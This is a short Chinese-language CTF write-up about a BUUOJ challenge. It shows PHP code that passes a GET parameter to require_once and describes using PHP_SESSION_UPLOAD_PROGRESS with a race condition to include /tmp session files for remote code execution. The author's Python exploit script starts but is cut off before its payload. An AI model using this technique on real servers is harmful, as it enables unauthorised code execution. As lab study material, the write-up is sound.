前言:
太菜了,只能不断的复现题目来扩充自己的知识点。
考点:
require_once 绕过
PHP_SESSION_UPLOAD_PROGRESS文件上传
解题:
解一:
进入环境。
<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
require_once $_GET['file'];
}
现在看到 include 和 require_once 都会不由得想到 利用PHP_SESSION_UPLOAD_PROGRESS来上传临时文件去RCE。 上传利用条件竞争去访问 /tmp/sess_xxx进行文件包含。关于这方面的知识就不班门弄斧了:利用session.upload_progress进行文件包含和反序列化渗透 - FreeBuf网络安全行业门户
直接搬出我的exp:
import io
import requests
import threading
import time
url="http://613661fb-f8a9-4121-91b4-4f1329e22bae.node4.buuoj.cn:81/"
sessid="snowy"
myfile=io.BytesIO(b&